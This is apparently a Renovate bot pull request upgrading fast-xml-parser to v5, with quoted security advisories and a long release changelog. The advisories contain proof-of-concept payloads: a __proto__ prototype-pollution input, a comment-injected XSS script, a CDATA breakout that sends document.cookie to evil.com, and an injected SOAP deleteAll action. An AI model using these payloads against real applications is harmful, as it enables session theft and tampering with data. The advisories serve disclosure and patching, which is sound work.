Update dependency fast-xml-parser to v5 [SECURITY]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
fast-xml-parser	^3.17.6 → ^5.0.0
fast-xml-parser	3.17.6 → 5.7.0

---

fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name

CVE-2023-26920 / GHSA-x3cc-x39p-42qx

More information

Details

Impact

As a part of this vulnerability, user was able to se code using __proto__ as a tag or attribute name.

const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");

let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);

console.log(jObj.polluted) // should return hacked

Patches

The problem has been patched in v4.1.2

Workarounds

User can check for "proto" in the XML string before parsing it to the parser.

References

https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

• https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx
• https://github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804
• https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
• https://nvd.nist.gov/vuln/detail/CVE-2023-26920
• https://github.com/advisories/GHSA-793h-6f7r-6qvm
• https://github.com/advisories/GHSA-x3cc-x39p-42qx

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters

CVE-2026-41650 / GHSA-gh4j-gqv2-49f6

More information

Details

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

• CVE-2023-26920: Prototype pollution (parser)
• CVE-2023-34104: ReDoS (parser)
• CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder
• CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept

Test 1: Comment Injection (XSS in SVG/HTML context)

import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)

const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>

Test 3: SOAP Message Injection

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true

Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
2. SOAP injection: Modify SOAP message structure by injecting XML elements
3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#​45;&#​45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

Severity

• CVSS Score: 6.1 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

• https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6
• https://github.com/advisories/GHSA-gh4j-gqv2-49f6

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

Compare Source

v5.6.0

Compare Source

v5.5.12

Compare Source

v5.5.11

Compare Source

v5.5.10: performance improvment, increase entity expansion default limit

Compare Source

• increase default entity explansion limit as many projects demand for that

maxEntitySize: 10000,
maxExpansionDepth: 10000,
maxTotalExpansions: Infinity,
maxExpandedLength: 100000,
maxEntityCount: 1000,

• performance improvement
  • reduce calls to toString
  • early return when entities are not present
  • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

v5.5.9: fix typins and matcher instance in callbacks

Compare Source

combine typings file to avoid configuration changes
pass readonly instance of matcher to the call backs to avoid accidental push/pop call

v5.5.8

Compare Source

v5.5.7

Compare Source

v5.5.6: fix entity expansion and incorrect replacement and performance

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.5...v5.5.6

v5.5.5

Compare Source

v5.5.4

Compare Source

v5.5.3

Compare Source

v5.5.2

Compare Source

v5.5.1: integrate path-expression-matcher

Compare Source

• support path-expression-matcher
• fix: stopNode should not be parsed
• performance improvement for stopNode checking

v5.5.0

Compare Source

v5.4.2

Compare Source

v5.4.1

Compare Source

v5.4.0: Separate Builder

Compare Source

XML Builder was the part of fast-xml-parser for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.

Migration

To migrate to fast-xml-builder;

From

import { XMLBuilder } from "fast-xml-parser";

To

import  XMLBuilder  from "fast-xml-builder";

XMLBuilder will be removed from current package in any next major version of this library. So better to migrate.

v5.3.9: support strictReservedNames

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.9...v5.3.9

v5.3.8: handle non-array input for XML builder && support maxNestedTags

Compare Source

• support maxNestedTags
• handle non-array input for XML builder when preserveOrder is true (By Angelo Coetzee)
• save use of js properies
  Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.7...v5.3.8

v5.3.7: CJS typing fix

Compare Source

What's Changed

• Unexport X2jOptions at declaration site by @​Drarig29 in #​787

New Contributors

• @​Drarig29 made their first contribution in #​787

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.6...v5.3.7

v5.3.6: Entity security and performance

Compare Source

• Improve security and performance of entity processing
  • new options maxEntitySize, maxExpansionDepth, maxTotalExpansions, maxExpandedLength, allowedTags,tagFilter
  • fast return when no edtity is present
  • improvement replacement logic to reduce number of calls

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.5...v5.3.6

v5.3.5

Compare Source

v5.3.4: fix: handle HTML numeric and hex entities when out of range

Compare Source

v5.3.3: bug fix and performance improvements

Compare Source

• fix #​775: transformTagName with allowBooleanAttributes adds an unnecessary attribute
• Performance improvement for stopNodes (By Maciek Lamberski)

v5.3.2

Compare Source

v5.3.1

Compare Source

v5.3.0

Compare Source

v5.2.5

Compare Source

v5.2.4

Compare Source

v5.2.3

Compare Source

v5.2.2: upgrade to ESM module and fixing value parsing issues

Compare Source

• Support ESM modules
• fix value parsing issues
• a feature to access tag location is added (metadata)
• fix to read DOCTYPE correctly

Full Changelog: https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md

v5.2.1

Compare Source

v5.2.0

Compare Source

v5.1.0

Compare Source

• feat: declare package as side-effect free (#​738) (By Thomas Bouffard)
• fix cjs build mode
• fix builder return type to string

5.0.9 / 2025-03-14

• fix: support numeric entities with values over 0xFFFF (#​726) (By Marc Durdin)
• fix: update strnum to fix parsing 0 if skiplike option is used

5.0.8 / 2025-02-27

• fix parsing 0 if skiplike option is used.
  • updating strnum dependency

5.0.7 / 2025-02-25

• fix (#​724) typings for cjs.

5.0.6 / 2025-02-20

• fix cli output (By Angel Delgado)
  • remove multiple JSON parsing

5.0.5 / 2025-02-20

• fix parsing of string starting with 'e' or 'E' by updating strnum

5.0.4 / 2025-02-20

• fix CLI to support all the versions of node js when displaying library version.
• fix CJS import in v5
  • by fixing webpack config

5.0.3 / 2025-02-20

• Using strnum ESM module
  • new fixes in strum may break your experience

5.0.2 / 2025-02-20

• fix: include CommonJS resources in the npm package #​714 (By Thomas Bouffard)
• fix: move babel deps to dev deps

5.0.1 / 2025-02-19

• fix syntax error for CLI command

5.0.0 / 2025-02-19

• ESM support
  • no change in the functionality, syntax, APIs, options, or documentation.

4.5.2 / 2025-02-18

• Fix null CDATA to comply with undefined behavior (#​701) (By Matthieu BOHEAS)
• Fix(performance): Update check for leaf node in saveTextToParentTag function in OrderedObjParser.js (#​707) (By ...)
• Fix: emit full JSON string from CLI when no output filename specified (#​710) (By Matt Benson)

4.5.1 / 2024-12-15

• Fix empty tag key name for v5 (#​697). no impact on v4
• Fixes entity parsing when used in strict mode (#​699)

4.5.0 / 2024-09-03

• feat #​666: ignoreAttributes support function, and array of string or regex (By ArtemM)

4.4.1 / 2024-07-28

• v5 fix: maximum length limit to currency value
• fix #​634: build attributes with oneListGroup and attributesGroupName (#​653)(By Andreas Naziris)
• fix: get oneListGroup to work as expected for array of strings (#​662)(By Andreas Naziris)

4.4.0 / 2024-05-18

• fix #​654: parse attribute list correctly for self closing stop node.
• fix: validator bug when closing tag is not opened. (#​647) (By Ryosuke Fukatani)
• fix #​581: typings; return type of tagValueProcessor & attributeValueProcessor (#​582) (By monholm)

4.3.6 / 2024-03-16

• Add support for parsing HTML numeric entities (#​645) (By Jonas Schade )

4.3.5 / 2024-02-24

• code for v5 is added for experimental use

4.3.4 / 2024-01-10

• fix: Don't escape entities in CDATA sections (#​633) (By wackbyte)

4.3.3 / 2024-01-10

• Remove unnecessary regex

4.3.2 / 2023-10-02

• fix jObj.hasOwnProperty when give input is null (By Arda TANRIKULU)

4.3.1 / 2023-09-24

• revert back "Fix typings for builder and parser to make return type generic" to avoid failure of existing projects. Need to decide a common approach.

4.3.0 / 2023-09-20

• Fix stopNodes to work with removeNSPrefix (#​607) (#​608) (By [Craig Andrews]https://github.com/candrews))
• Fix #​610 ignore properties set to Object.prototype
• Fix typings for builder and parser to make return type generic (By Sarah Dayan)

4.2.7 / 2023-07-30

• Fix: builder should set text node correctly when only textnode is present (#​589) (By qianqing)
• Fix: Fix for null and undefined attributes when building xml (#​585) (#​598). A null or undefined value should be ignored. (By Eugenio Ceschia)

4.2.6 / 2023-07-17

• Fix: Remove trailing slash from jPath for self-closing tags (#​595) (By Maciej Radzikowski)

4.2.5 / 2023-06-22

• change code implementation

4.2.4 / 2023-06-06

• fix security bug

4.2.3 / 2023-06-05

• fix security bug

4.2.2 / 2023-04-18

• fix #​562: fix unpaired tag when it comes in last of a nested tag. Also throw error when unpaired tag is used as closing tag

4.2.1 / 2023-04-18

• fix: jpath after unpaired tags

4.2.0 / 2023-04-09

• support updateTag parser property

4.1.4 / 2023-04-08

• update typings to let user create XMLBuilder instance without options (#​556) (By Patrick)
• fix: IsArray option isn't parsing tags with 0 as value correctly #​490 (#​557) (By Aleksandr Murashkin)
• feature: support oneListGroup to group repeated children tags udder single group

4.1.3 / 2023-02-26

• fix #​546: Support complex entity value

4.1.2 / 2023-02-12

• Security Fix

4.1.1 / 2023-02-03

• Fix #​540: ignoreAttributes breaks unpairedTags
• Refactor XML builder code

4.1.0 / 2023-02-02

• Fix '<' or '>' in DTD comment throwing an error. (#​533) (By Adam Baker)
• Set "eNotation" to 'true' as default

4.0.15 / 2023-01-25

• make "eNotation" optional

4.0.14 / 2023-01-22

• fixed: add missed typing "eNotation" to parse values

4.0.13 / 2023-01-07

• preserveorder formatting (By mdeknowis)
• support transformAttributeName (By Erik Rothoff Andersson)

4.0.12 / 2022-11-19

• fix typescript

4.0.11 / 2022-10-05

• fix #​501: parse for entities only once

4.0.10 / 2022-09-14

• fix broken links in demo site (By Yannick Lang)
• fix #​491: tagValueProcessor type definition (By Andrea Francesco Speziale)
• Add jsdocs for tagValueProcessor

4.0.9 / 2022-07-10

• fix #​470: stop-tag can have self-closing tag with same name
• fix #​472: stopNode can have any special tag inside
• Allow !ATTLIST and !NOTATION with DOCTYPE
• Add transformTagName option to transform tag names when parsing (#​469) (By Erik Rothoff Andersson)

4.0.8 / 2022-05-28

• Fix CDATA parsing returning empty string when value = 0 (#​451) (By ndelanou)
• Fix stopNodes when same tag appears inside node (#​456) (By patrickshipe)
• fix #​468: prettify own properties only

4.0.7 / 2022-03-18

• support CDATA even if tag order is not preserved
• support Comments even if tag order is not preserved
• fix #​446: XMLbuilder should not indent XML declaration

4.0.6 / 2022-03-08

• fix: call tagValueProcessor only once for array items
• fix: missing changed for #​437

4.0.5 / 2022-03-06

• fix #​437: call tagValueProcessor from XML builder

4.0.4 / 2022-03-03

• fix #​435: should skip unpaired and self-closing nodes when set as stopnodes

4.0.3 / 2022-02-15

• fix: ReferenceError when Bundled with Strict (#​431) (By Andreas Heissenberger)

4.0.2 / 2022-02-04

• builder supports suppressUnpairedNode
• parser supports ignoreDeclaration and ignorePiTags
• fix: when comment is parsed as text value if given as <!--> ... #​423
• builder supports decoding &

4.0.1 / 2022-01-08

• fix builder for pi tag
• fix: support suppressBooleanAttrs by builder

4.0.0 / 2022-01-06

• Generating different combined, parser only, builder only, validator only browser bundles
• Keeping cjs modules as they can be imported in cjs and esm modules both. Otherwise refer esm branch.

4.0.0-beta.8 / 2021-12-13

• call tagValueProcessor for stop nodes

4.0.0-beta.7 / 2021-12-09

• fix Validator bug when an attribute has no value but '=' only
• XML Builder should suppress unpaired tags by default.
• documents update for missing features
• refactoring to use Object.assign
• refactoring to remove repeated code

4.0.0-beta.6 / 2021-12-05

• Support PI Tags processing
• Support suppressBooleanAttributes by XML Builder for attributes with value true.

4.0.0-beta.5 / 2021-12-04

• fix: when a tag with name "attributes"

4.0.0-beta.4 / 2021-12-02

• Support HTML document parsing
• skip stop nodes parsing when building the XML from JS object
• Support external entites without DOCTYPE
• update dev dependency: strnum v1.0.5 to fix long number issue

4.0.0-beta.3 / 2021-11-30

• support global stopNodes expression like "*.stop"
• support self-closing and paired unpaired tags
• fix: CDATA should not be parsed.
• Fix typings for XMLBuilder (#​396)(By Anders Emil Salvesen)
• supports XML entities, HTML entities, DOCTYPE entities

⚠️ 4.0.0-beta.2 / 2021-11-19

• rename attrMap to attibutes in parser output when preserveOrder:true
• supports unpairedTags

⚠️ 4.0.0-beta.1 / 2021-11-18

• Parser returns an array now
  • to make the structure common
  • and to return root level detail
• renamed cdataTagName to cdataPropName
• Added commentPropName
• fix typings

⚠️ 4.0.0-beta.0 / 2021-11-16

• Name change of many configuration properties.
  • attrNodeName to attributesGroupName
  • attrValueProcessor to attributeValueProcessor
  • parseNodeValue to parseTagValue
  • ignoreNameSpace to removeNSPrefix
  • numParseOptions to numberParseOptions
  • spelling correction for suppressEmptyNode
• Name change of cli and browser bundle to fxparser
• isArray option is added to parse a tag into array
• preserveOrder option is added to render XML in such a way that the result js Object maintains the order of properties same as in XML.
• Processing behaviour of tagValueProcessor and attributeValueProcessor are changes with extra input parameters
• j2xparser is renamed to XMLBuilder.
• You need to build XML parser instance for given options first before parsing XML.
• fix #​327, #​336: throw error when extra text after XML content
• fix #​330: attribute value can have '\n',
• fix #​350: attrbiutes can be separated by '\n' from tagname

3.21.1 / 2021-10-31

• Correctly format JSON elements with a text prop but no attribute props ( By haddadnj )

3.21.0 / 2021-10-25

• feat: added option rootNodeName to set tag name for array input when converting js object to XML.
• feat: added option alwaysCreateTextNode to force text node creation (by: @​massimo-ua)
• ⚠️ feat: Better error location for unclosed tags. (by @​Gei0r)
  • Some error messages would be changed when validating XML. Eg
    • { InvalidXml: "Invalid '[ \"rootNode\"]' found." } → {InvalidTag: "Unclosed tag 'rootNode'."}
    • { InvalidTag: "Closing tag 'rootNode' is expected inplace of 'rootnode'." } → { InvalidTag: "Expected closing tag 'rootNode' (opened in line 1) instead of closing tag 'rootnode'."}
• ⚠️ feat: Column in error response when validating XML

{
  "code": "InvalidAttr",
  "msg":  "Attribute 'abc' is repeated.",
  "line": 1,
  "col": 22
}

3.20.1 / 2021-09-25

• update strnum package

3.20.0 / 2021-09-10

• Use strnum npm package to parse string to number
  • breaking change: long number will be parsed to scientific notation.

3.19.0 / 2021-03-14

• License changed to MIT original
• Fix #​321 : namespace tag parsing

3.18.0 / 2021-02-05

• Support RegEx and function in arrayMode option
• Fix #​317 : validate nested PI tags

3.17.4 / 2020-06-07

• Refactor some code to support IE11
• Fix: <tag > space as attribute string

3.17.3 / 2020-05-23

• Fix: tag name separated by \n \t
• Fix: throw error for unclosed tags

3.17.2 / 2020-05-23

• Fixed an issue in processing doctype tag
• Fixed tagName where it should not have whitespace chars

3.17.1 / 2020-05-19

• Fixed an issue in checking opening tag

3.17.0 / 2020-05-18

• parser: fix '<' issue when it comes in aatr value
• parser: refactoring to remove dependency from regex
• validator: fix IE 11 issue for error messages
• updated dev dependencies
• separated benchmark module to sub-module
• breaking change: comments will not be removed from CDATA data

3.16.0 / 2020-01-12

• validaor: fix for ampersand characters (#​215)
• refactoring to support unicode chars in tag name
• update typing for validator error

3.15.1 / 2019-12-09

• validaor: fix multiple roots are not allowed

3.15.0 / 2019-11-23

• validaor: improve error messaging
• validator: add line number in case of error
• validator: add more error scenarios to make it more descriptive

3.14.0 / 2019-10-25

• arrayMode for XML to JS obj parsing

3.13.0 / 2019-10-02

• pass tag/attr name to tag/attr value processor
• inbuilt optional validation with XML parser

3.12.21 / 2019-10-02

• Fix validator for unclosed XMLs
• move nimnjs dependency to dev dependency
• update dependencies

3.12.20 / 2019-08-16

• Revert: Fix #​167: '>' in attribute value as it is causing high performance degrade.

3.12.19 / 2019-07-28

• Fix js to xml parser should work for date values. (broken: tagValueProcessor will receive the original value instead of string always) (breaking change)

3.12.18 / 2019-07-27

• remove configstore dependency

3.12.17 / 2019-07-14

• Fix #​167: '>' in attribute value

3.12.16 / 2019-03-23

• Support a new option "stopNodes". (#​150)
  Accept the list of tags which are not required to be parsed. Instead, all the nested tag and data will be assigned as string.
• Don't show post-install message

3.12.12 / 2019-01-11

• fix : IE parseInt, parseFloat error

3.12.11 / 2018-12-24

• fix #​132: "/" should not be parsed as boolean attr in case of self closing tags

3.12.9 / 2018-11-23

• fix #​129 : validator should not fail when an atrribute name is 'length'

3.12.8 / 2018-11-22

• fix #​128 : use 'attrValueProcessor' to process attribute value in json2xml parser

3.12.6 / 2018-11-10

• Fix #​126: check for type

3.12.4 / 2018-09-12

• Fix: include tasks in npm package

3.12.3 / 2018-09-12

• Fix CLI issue raised in last PR

3.12.2 / 2018-09-11

• Fix formatting for JSON to XML output
• Migrate to webpack (PR merged)
• fix cli (PR merged)

3.12.0 / 2018-08-06

• Support hexadecimal values
• Support true number parsing

3.11.2 / 2018-07-23

• Update Demo for more options
• Update license information
• Update readme for formatting, users, and spelling mistakes
• Add missing typescript definition for j2xParser
• refactoring: change filenames

3.11.1 / 2018-06-05

• fix #​93: read the text after self closing tag

3.11.0 / 2018-05-20

• return defaultOptions if there are not options in buildOptions function
• added localeRange declaration in parser.d.ts
• Added support of cyrillic characters in validator XML
• fixed bug in validator work when XML data with byte order marker

3.10.0 / 2018-05-13

• Added support of cyrillic characters in parsing XML to JSON

3.9.11 / 2018-05-09

• fix #​80 fix nimn chars
• update package information
• fix #​86: json 2 xml parser : property with null value should be parsed to self closing tag.
• update online demo
• revert zombiejs to old version to support old version of node
• update dependencies

3.3.10 / 2018-04-23

• fix #​77 : parse even if closing tag has space before '>'
• include all css & js lib in demo app
• remove babel dependencies until needed

3.3.9 / 2018-04-18

• fix #​74 : TS2314 TypeScript compiler error

3.3.8 / 2018-04-17

• fix #​73 : IE doesn't support Object.assign

3.3.7 / 2018-04-14

• fix: use let insted of const in for loop of validator
• Merge pull request
  #​71 from bb/master
  first draft of typings for typescript
  #​69
• Merge pull request
  #​70 from bb/patch-1
  fix some typos in readme

3.3.6 / 2018-03-21

• change arrow functions to full notation for IE compatibility

3.3.5 / 2018-03-15

• fix #​67 : attrNodeName invalid behavior
• fix: remove decodeHTML char condition

3.3.4 / 2018-03-14

• remove dependency on "he" package
• refactor code to separate methods in separate files.
• draft code for transforming XML to json string. It is not officially documented due to performance issue.

3.3.0 / 2018-03-05

• use common default options for XML parsing for consistency. And add parseToNimn method.
• update nexttodo
• update README about XML to Nimn transformation and remove special notes about 3.x release
• update CONTRIBUTING.ms mentioning nexttodo
• add negative case for XML PIs
• validate xml processing instruction tags #​62
• nimndata: handle array with object
• nimndata: node with nested node and text node
• nimndata: handle attributes and text node
• nimndata: add options, handle array
• add xml to nimn data converter
• x2j: direct access property with tagname
• update changelog
• fix validator when single quote presents in value enclosed with double quotes or vice versa
• Revert "remove unneded nimnjs dependency, move opencollective to devDependencies and replace it
  with more light opencollective-postinstall"
  This reverts commit d47aa71.
• Merge pull request: #​63 from HaroldPutman/suppress-undefined
  Keep undefined nodes out of the XML output : This is useful when you are deleting nodes from the JSON and rewriting XML.

3.2.4 / 2018-03-01

• fix #​59 fix in validator when open quote presents in attribute value
• Create nexttodo.md
• exclude static from bitHound tests
• add package lock

3.2.3 / 2018-02-28

• Merge pull request from Delagen/master: fix namespaces can contain the same characters as xml names

3.2.2 / 2018-02-22

• fix: attribute xmlns should not be removed if ignoreNameSpace is false
• create CONTRIBUTING.md

3.2.1 / 2018-02-17

• fix: empty attribute should be parsed

3.2.0 / 2018-02-16

• Merge pull request : Dev to Master
• Update README and version
• j2x:add performance test
• j2x: Remove extra empty line before closing tag
• j2x: suppress empty nodes to self closing node if configured
• j2x: provide option to give indentation depth
• j2x: make optional formatting
• j2x: encodeHTMLchat
• j2x: handle cdata tag
• j2x: handle grouped attributes
• convert json to xml
  • nested object
  • array
  • attributes
  • text value
• small refactoring
• Merge pull request: Update cli.js to let user validate XML file or data
• Add option for rendering CDATA as separate property

3.0.1 / 2018-02-09

• fix CRLF: replace it with single space in attributes value only.

3.0.0 / 2018-02-08

• change online tool with new changes
• update info about new options
• separate tag value processing to separate function
• make HTML decoding optional
• give an option to allow boolean attributes
• change cli options as per v3
• Correct comparison table format on README
• update v3 information
• some performance improvement changes
• Make regex object local to the method and move some common methods to util
• Change parser to
  • handle multiple instances of CDATA
  • make triming of value optionals
  • HTML decode attribute and text value
  • refactor code to separate files
• Ignore newline chars without RE (in validator)
• validate for XML prolog
• Validate DOCTYPE without RE
• Update validator to return error response
• Update README to add detail about V3
• Separate xmlNode model class
• include vscode debug config
• fix for repeated object
• fix attribute regex for boolean attributes
• Fix validator for invalid attributes
  2.9.4 / 2018-02-02
• Merge pull request: Decode HTML characters
• refactor source folder name
• ignore bundle / browser js to be published to npm
  2.9.3 / 2018-01-26
• Merge pull request: Correctly remove CRLF line breaks
• Enable to parse attribute in online editor
• Fix testing demo app test
• Describe parsing options
• Add options for online demo
  2.9.2 / 2018-01-18
• Remove check if tag starting with "XML"
• Fix: when there are spaces before / after CDATA

2.9.1 / 2018-01-16

• Fix: newline should be replaced with single space
• Fix: for single and multiline comments
• validate xml with CDATA
• Fix: the issue when there is no space between 2 attributes
• Fix: #​33: when there is newline char in attr val, it doesn't parse
• Merge pull request: fix ignoreNamespace
  • fix: don't wrap attributes if only namespace attrs
  • fix: use portfinder for run tests, update deps
  • fix: don't treat namespaces as attributes when ignoreNamespace enabled

2.9.0 / 2018-01-10

• Rewrite the validator to handle large files.
  Ignore DOCTYPE validation.
• Fix: When attribute value has equal sign

2.8.3 / 2017-12-15

• Fix: when a tag has value along with subtags

2.8.2 / 2017-12-04

• Fix value parsing for IE

2.8.1 / 2017-12-01

• fix: validator should return false instead of err when invalid XML

2.8.0 / 2017-11-29

• Add CLI option to ignore value conversion
• Fix variable name when filename is given on CLI
• Update CLI help text
• Merge pull request: xml2js: Accept standard input
• Test Node 8
• Update dependencies
• Bundle readToEnd
• Add ability to read from standard input

2.7.4 / 2017-09-22

• Merge pull request: Allow wrap attributes with subobject to compatible with other parsers output

2.7.3 / 2017-08-02

• fix: handle CDATA with regx

2.7.2 / 2017-07-30

• Change travis config for yarn caching
• fix validator: when tag property is same as array property
• Merge pull request: Failing test case in validator for valid SVG

2.7.1 / 2017-07-26

• Fix: Handle val 0

2.7.0 / 2017-07-25

• Fix test for arrayMode
• Merge pull request: Add arrayMode option to parse any nodes as arrays

2.6.0 / 2017-07-14

• code improvement
• Add unit tests for value conversion for attr
• Merge pull request: option of an attribute value conversion to a number (textAttrConversion) the same way as the textNodeConversion option does. Default value is false.

2.5.1 / 2017-07-01

• Fix XML element name pattern
• Fix XML element name pattern while parsing
• Fix validation for xml tag element

2.5.0 / 2017-06-25

• Improve Validator performance
• update attr matching regex
• Add perf tests
• Improve atrr regex to handle all cases

2.4.4 / 2017-06-08

• Bug fix: when an attribute has single or double quote in value

2.4.3 / 2017-06-05

• Bug fix: when multiple CDATA tags are given
• Merge pull request: add option "textNodeConversion"
• add option "textNodeConversion"

2.4.1 / 2017-04-14

• fix tests
• Bug fix: preserve initial space of node value
• Handle CDATA

2.3.1 / 2017-03-15

• Bug fix: when single self closing tag
• Merge pull request: fix .codeclimate.yml
• Update .codeclimate.yml - Fixed config so it does not error anymore.
• Update .codeclimate.yml

2.3.0 / 2017-02-26

• Code improvement
• add bithound config
• Update usage
• Update travis to generate bundle js before running tests
• 1.Browserify, 2. add more tests for validator
• Add validator
• Fix CLI default parameter bug

2.2.1 / 2017-02-05

• Bug fix: CLI default option

v5.0.9

Compare Source

v5.0.8: Summary update on all the previous releases from v4.2.4

Compare Source

• Multiple minor fixes provided in the validator and parser
• v6 is added for experimental use.
• ignoreAttributes support function, and array of string or regex
• Add support for parsing HTML numeric entities
• v5 of the application is ESM module now. However, JS is also supported

Note: Release section in not updated frequently. Please check CHANGELOG or Tags for latest release information.

v5.0.7

Compare Source

v5.0.6

Compare Source

v5.0.5

Compare Source

v5.0.4

Compare Source

v5.0.3

Compare Source

v5.0.2

Compare Source

v5.0.1

Compare Source

v5.0.0

Compare Source

v4.5.6

Compare Source

v4.5.5

Compare Source

v4.5.4

Compare Source

v4.5.3

Compare Source

v4.5.2

Compare Source

v4.5.1

Compare Source

v4.5.0

Compare Source

v4.4.1

Compare Source

v4.4.0

Compare Source

v4.3.6

Compare Source

v4.3.5

Compare Source

v4.3.4

Compare Source

v4.3.3

Compare Source

v4.3.2

Compare Source

v4.3.1

Compare Source

v4.3.0

Compare Source

v4.2.7

Compare Source

v4.2.6

Compare Source

v4.2.5

Compare Source

[v4.2.4](https://redirect.github.c

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.